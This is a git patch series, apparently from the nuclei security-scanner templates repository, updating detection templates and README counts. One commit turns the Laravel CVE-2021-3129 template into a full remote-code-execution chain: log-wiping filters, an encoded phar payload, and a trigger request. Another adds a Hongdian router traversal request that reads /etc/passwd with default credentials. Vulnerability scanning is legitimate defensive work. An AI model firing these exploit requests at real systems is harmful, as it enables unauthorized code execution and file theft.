00:40:09 +0530 Subject: [PATCH 0381/4083] Added content length condition --- exposures/configs/exposed-gitignore.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index 4584811b32..d31f035d9c 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -29,3 +29,7 @@ requests: - type: dsl dsl: - 'contains(tolower(all_headers), "binary/octet-stream")' + + - type: dsl + dsl: + - "len(body) > 50 " \ No newline at end of file From eb31f87e0aeef2ea6233b28f851a775f871aec1d Mon Sep 17 00:00:00 2001 From: Gregory Boddin Date: Fri, 9 Jul 2021 21:13:23 +0200 Subject: [PATCH 0382/4083] [fix] Added open-mjpg-streamer --- iot/open-mjpg-streamer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/iot/open-mjpg-streamer.yml b/iot/open-mjpg-streamer.yml index fc0ed0eefd..f12a8c4acb 100755 --- a/iot/open-mjpg-streamer.yml +++ b/iot/open-mjpg-streamer.yml @@ -1,4 +1,4 @@ -id: open-mjpg-streamer +id: open-mjpg-streamer info: name: open-mjpg-streamer From 5d0db35b67d2521aaa995b0194a9de8c9233efb7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 01:17:38 +0530 Subject: [PATCH 0383/4083] filename and matcher update --- iot/{open-mjpg-streamer.yml => open-mjpg-streamer.yaml} | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename iot/{open-mjpg-streamer.yml => open-mjpg-streamer.yaml} (78%) diff --git a/iot/open-mjpg-streamer.yml b/iot/open-mjpg-streamer.yaml similarity index 78% rename from iot/open-mjpg-streamer.yml rename to iot/open-mjpg-streamer.yaml index f12a8c4acb..07826b437c 100755 --- a/iot/open-mjpg-streamer.yml +++ b/iot/open-mjpg-streamer.yaml @@ -11,13 +11,16 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?action=snapshot" + - "{{BaseURL}}/?action=stream" + + max-size: 2048 matchers-condition: and matchers: - type: word words: - - 'JFIF' - part: body + - 'MJPG-Streamer/0.2' + part: header + - type: status status: - 200 From 7e9af4c053d189b6f8098cbef8a52dc87124e1e0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 9 Jul 2021 19:48:54 +0000 Subject: [PATCH 0384/4083] Auto Update README [Fri Jul 9 19:48:54 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 694bb0abba..29ce2e4b7f 100644 --- a/README.md +++ b/README.md @@ -42,9 +42,9 @@ An overview of the nuclei template directory including number of templates assoc | takeovers | 69 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | -| fuzzing | 10 | helpers | 9 | iot | 13 | +| fuzzing | 10 | helpers | 9 | iot | 14 | -**126 directories, 1447 files**. +**126 directories, 1448 files**. From 3f46e4842639a2032e4ed0f3012694546cf1357d Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 10 Jul 2021 01:26:45 +0530 Subject: [PATCH 0385/4083] Update jira-unauthenticated-installed-gadgets.yaml --- .../jira/jira-unauthenticated-installed-gadgets.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml b/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml index 2004a6ca1d..c6fc032baf 100644 --- a/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml +++ b/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/rest/config/1.0/directory" + redirects: true max-redirects: 2 matchers-condition: and @@ -17,7 +18,7 @@ requests: - type: word words: - 'jaxbDirectoryContents' - condition: or + - type: status status: - 200 From c36a62a120afd5cd522fc4e5719900cf27eed213 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 10 Jul 2021 01:28:30 +0530 Subject: [PATCH 0386/4083] Update jira-unauthenticated-installed-gadgets.yaml --- vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml b/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml index c6fc032baf..da56b71092 100644 --- a/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml +++ b/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml @@ -5,6 +5,7 @@ info: author: philippedelteil severity: info description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + tags: atlassian,jira requests: - method: GET From 7832d4f58b157bfd74e3bb050cd8a2cd29078407 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 9 Jul 2021 19:59:11 +0000 Subject: [PATCH 0387/4083] Auto Update README [Fri Jul 9 19:59:10 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 29ce2e4b7f..c409bcb3ff 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 383 | vulnerabilities | 211 | exposed-panels | 189 | +| cves | 383 | vulnerabilities | 212 | exposed-panels | 189 | | takeovers | 69 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 14 | -**126 directories, 1448 files**. +**126 directories, 1449 files**. From 9156e332294379bd70f64a89631eebe46a1324cf Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 10 Jul 2021 01:31:10 +0530 Subject: [PATCH 0388/4083] Added tags and updated matcher --- iot/stem-audio-table-private-keys.yaml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/iot/stem-audio-table-private-keys.yaml b/iot/stem-audio-table-private-keys.yaml index 02cade8a05..e0dbd1c491 100644 --- a/iot/stem-audio-table-private-keys.yaml +++ b/iot/stem-audio-table-private-keys.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: high reference: https://blog.grimm-co.com/2021/06/the-walls-have-ears.html - tags: stem,config,exposure + tags: stem,config,exposure,iot requests: - method: GET @@ -17,7 +17,6 @@ requests: - type: word words: - "BEGIN RSA PRIVATE KEY" - condition: or - type: status status: @@ -25,6 +24,4 @@ requests: - type: dsl dsl: - - '!contains(body_2, " Date: Fri, 9 Jul 2021 20:04:52 +0000 Subject: [PATCH 0389/4083] Auto Update README [Fri Jul 9 20:04:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c409bcb3ff..d053626b62 100644 --- a/README.md +++ b/README.md @@ -42,9 +42,9 @@ An overview of the nuclei template directory including number of templates assoc | takeovers | 69 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | -| fuzzing | 10 | helpers | 9 | iot | 14 | +| fuzzing | 10 | helpers | 9 | iot | 15 | -**126 directories, 1449 files**. +**126 directories, 1450 files**. From 6c11d0714f0fe16b323cdb2b2db215f90fc545d6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 01:36:54 +0530 Subject: [PATCH 0390/4083] Update openam-detection.yaml --- technologies/openam-detection.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index bca4734af8..db7dd418c2 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -2,7 +2,7 @@ id: openam-detection info: name: Detect OpenAM and OpenSSO - author: philippedelteil + author: philippedelteil,melbadry9,xelkomy severity: info requests: @@ -27,6 +27,7 @@ requests: - "{{BaseURL}}/am/XUI/Login" - "{{BaseURL}}/am/json/serverinfo/*" - "{{BaseURL}}/openam/json/serverinfo/*" + redirects: true max-redirects: 2 matchers-condition: and @@ -40,9 +41,11 @@ requests: - 'FRForgotUsername' - 'successfulUserRegistrationDestination' condition: or + - type: status status: - 200 + extractors: - type: regex part: body From 0e09bc183d4f6169fbd3fc1c36e3fb5bc2e174b1 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 10 Jul 2021 03:08:30 +0000 Subject: [PATCH 0391/4083] Create checkpoint-panel.yaml Fixes #1915. --- exposed-panels/checkpoint-panel.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/checkpoint-panel.yaml diff --git a/exposed-panels/checkpoint-panel.yaml b/exposed-panels/checkpoint-panel.yaml new file mode 100644 index 0000000000..5bcb583712 --- /dev/null +++ b/exposed-panels/checkpoint-panel.yaml @@ -0,0 +1,28 @@ +id: checkpoint-panel + +info: + name: Checkpoint-panel + author: 0x240x23elu + severity: info + tags: panel,checkpoint + +requests: + - method: GET + path: + - "{{BaseURL}}/sslvpn/Login/Login" + + matchers-condition: and + redirects: true + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "Check Point Software" + - "sslvpn/Login" + - type: word + part: header + words: + - "text/html" From 0246f73534c9076648abf23629ff84b53f0e294a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 10 Jul 2021 08:56:21 +0530 Subject: [PATCH 0392/4083] Update checkpoint-panel.yaml --- exposed-panels/checkpoint-panel.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/exposed-panels/checkpoint-panel.yaml b/exposed-panels/checkpoint-panel.yaml index 5bcb583712..7fd4c52612 100644 --- a/exposed-panels/checkpoint-panel.yaml +++ b/exposed-panels/checkpoint-panel.yaml @@ -1,7 +1,7 @@ id: checkpoint-panel info: - name: Checkpoint-panel + name: Checkpoint Panel author: 0x240x23elu severity: info tags: panel,checkpoint @@ -10,7 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/sslvpn/Login/Login" - + - "{{BaseURL}}/Login/Login" matchers-condition: and redirects: true matchers: @@ -20,8 +20,9 @@ requests: - type: word part: body words: - - "Check Point Software" - - "sslvpn/Login" + - "Check Point Software Technologies Ltd. All rights reserved." + - "/Login/images/CompanyLogo.png" + condition: and - type: word part: header words: From 86c78897cc5f42ff456d74940cf66bb4a08af2ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 03:30:19 +0000 Subject: [PATCH 0393/4083] Auto Update README [Sat Jul 10 03:30:19 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d053626b62..133bc2ae06 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 383 | vulnerabilities | 212 | exposed-panels | 189 | +| cves | 383 | vulnerabilities | 212 | exposed-panels | 190 | | takeovers | 69 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**126 directories, 1450 files**. +**126 directories, 1451 files**. From a0d643561f5705e37b739e48f24a9f7dbf8ec64d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 10 Jul 2021 09:18:32 +0530 Subject: [PATCH 0394/4083] Update icewarp-webclient-rce.yaml --- vulnerabilities/other/icewarp-webclient-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml index 192fc314c3..caa8758541 100644 --- a/vulnerabilities/other/icewarp-webclient-rce.yaml +++ b/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -20,7 +20,7 @@ requests: matchers: - type: word words: - - "Microsoft Windows" + - "Microsoft Windows [Version" part: body - type: status From 6688aaca610ecffc93966eafcf0b00615cfd8737 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 03:54:03 +0000 Subject: [PATCH 0395/4083] Auto Update README [Sat Jul 10 03:54:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 133bc2ae06..c0a15dcf5a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 383 | vulnerabilities | 212 | exposed-panels | 190 | +| cves | 383 | vulnerabilities | 213 | exposed-panels | 190 | | takeovers | 69 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**126 directories, 1451 files**. +**126 directories, 1452 files**. From c2f87a94c6a70334ade8991d05e059f7ff39d687 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 13:42:09 +0530 Subject: [PATCH 0396/4083] Added complete RCE chain --- cves/2021/CVE-2021-3129.yaml | 84 +++++++++++++++++++++++++++++++++--- 1 file changed, 77 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 4137a0ebc4..d504289755 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -1,15 +1,15 @@ id: CVE-2021-3129 info: - name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION - author: z3bd + name: Laravel <= v8.4.2 Debug Mode - Remote Code Execution + author: z3bd,pdteam severity: critical description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. - reference: https://www.ambionics.io/blog/laravel-debug-rce + reference: | + - https://www.ambionics.io/blog/laravel-debug-rce + - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 tags: cve,cve2021,laravel,rce - # Note:- This is detection template, use the referenced article for detailed exploit. - requests: - raw: - | @@ -21,9 +21,79 @@ requests: Content-Length: 144 Content-Type: application/json - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd"}} + {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} + - | + POST /_ignition/execute-solution HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: deflate + Accept: application/json + Connection: close + Content-Length: 144 + Content-Type: application/json + + {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} + + - | + POST /_ignition/execute-solution HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: deflate + Accept: application/json + Connection: close + Content-Length: 144 + Content-Type: application/json + + {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}} + + - | + POST /_ignition/execute-solution HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: deflate + Accept: application/json + Connection: close + Content-Length: 144 + Content-Type: application/json + + {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}} + + - | + POST /_ignition/execute-solution HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: deflate + Accept: application/json + Connection: close + Content-Length: 144 + Content-Type: application/json + + {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} + + - | + POST /_ignition/execute-solution HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: deflate + Accept: application/json + Connection: close + Content-Length: 144 + Content-Type: application/json + + {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}} + + matchers-condition: and matchers: + - type: status + status: + - 500 + - type: word words: - - "failed to open stream: Permission denied" \ No newline at end of file + - "uid=" + - "gid=" + - "groups=" + - "Illuminate" + part: body + condition: and + + extractors: + - type: regex + regex: + - "(u|g)id=.*" From 89029e1aa776cdf06b339319b06d2bac7c52595e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 14:08:20 +0530 Subject: [PATCH 0397/4083] Moving PR template to root --- .../PULL_REQUEST_TEMPLATE.md => PULL_REQUEST_TEMPLATE.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) rename .github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md => PULL_REQUEST_TEMPLATE.md (88%) diff --git a/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md similarity index 88% rename from .github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md rename to PULL_REQUEST_TEMPLATE.md index 890df943a9..053b299177 100644 --- a/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md +++ b/PULL_REQUEST_TEMPLATE.md @@ -3,10 +3,8 @@ -- _Fixed CVE-2020-XXX_ / _Added CVE-2020-XXX_ -- Reference: - - https://github.com/XXXXX/poc - - https://nvd.nist.gov/vuln/detail/CVE-2020-XXX +- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX +- References: ### Template Validation From 93225ca26d6e91ea01a0f107f3be85235f755a0b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 08:38:42 +0000 Subject: [PATCH 0398/4083] Auto Update README [Sat Jul 10 08:38:42 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c0a15dcf5a..7c6bc375a5 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**126 directories, 1452 files**. +**126 directories, 1453 files**. From 152ef6f809123f02435a617a90507a766402f5dd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 10 Jul 2021 14:56:54 +0530 Subject: [PATCH 0399/4083] Update ceros-takeover.yaml --- takeovers/ceros-takeover.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml index 49163a2ce8..88a4f132d6 100644 --- a/takeovers/ceros-takeover.yaml +++ b/takeovers/ceros-takeover.yaml @@ -3,9 +3,11 @@ id: ceros-takeover info: name: ceros takeover detection author: abison_binoy - severity: high + severity: info tags: takeover - reference: https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ + reference: | + - https://twitter.com/abison_binoy/status/1412606224030339072 + - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ requests: - method: GET @@ -15,6 +17,7 @@ requests: matchers: - type: word words: - - Sorry, page not found - - Please check the url and + - "Sorry, page not found" + - "Please check the url and" + - "https://view.ceros.com/" condition: and From 1c982979e444b6f50567ebdf53faf28606bb7408 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 10 Jul 2021 15:03:54 +0530 Subject: [PATCH 0400/4083] Update ceros-takeover.yaml --- takeovers/ceros-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml index 88a4f132d6..1116a9f6f7 100644 --- a/takeovers/ceros-takeover.yaml +++ b/takeovers/ceros-takeover.yaml @@ -19,5 +19,5 @@ requests: words: - "Sorry, page not found" - "Please check the url and" - - "https://view.ceros.com/" + - "/view.ceros.com/" condition: and From c4e6110a449b20f022ba34c1401f3d8d5c809e69 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 10 Jul 2021 09:36:01 +0000 Subject: [PATCH 0401/4083] Auto Update README [Sat Jul 10 09:36:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7c6bc375a5..95c1cb951d 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 383 | vulnerabilities | 213 | exposed-panels | 190 | -| takeovers | 69 | exposures | 112 | technologies | 113 | +| takeovers | 70 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**126 directories, 1453 files**. +**126 directories, 1454 files**. From 3bf1c929ed8fe697160b5cc38a56de84c41ad594 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 10 Jul 2021 21:16:35 +0900 Subject: [PATCH 0402/4083] Create Hongdian Vulnerability CVE-2021-28149 : Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. CVE-2021-28150 : Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. CVE-2021-28151 : Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-28149.yaml | 56 ++++++++++++++++ cves/2021/CVE-2021-28150.yaml | 55 +++++++++++++++ cves/2021/CVE-2021-28151.yaml | 67 +++++++++++++++++++ .../hongdian/hongdian-default-password.yaml | 49 ++++++++++++++ 4 files changed, 227 insertions(+) create mode 100644 cves/2021/CVE-2021-28149.yaml create mode 100644 cves/2021/CVE-2021-28150.yaml create mode 100644 cves/2021/CVE-2021-28151.yaml create mode 100644 default-logins/hongdian/hongdian-default-password.yaml diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml new file mode 100644 index 0000000000..64a5b8369d --- /dev/null +++ b/cves/2021/CVE-2021-28149.yaml @@ -0,0 +1,56 @@ +id: CVE-2021-28149 + +info: + name: Hongdian Directory Traversal + author: gy741 + severity: medium + description: | + Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. + reference: | + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 + tags: cve,cve2021,hongdian,traversal + +requests: + - raw: + - | + GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + - | + GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Authorization: Basic YWRtaW46YWRtaW4= + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/octet-stream" + part: header + + - type: regex + regex: + - "root:[x*]:0:0:" + - "sshd:[x*]" + - "root:[$]" + part: body diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml new file mode 100644 index 0000000000..0a2270e06d --- /dev/null +++ b/cves/2021/CVE-2021-28150.yaml @@ -0,0 +1,55 @@ +id: 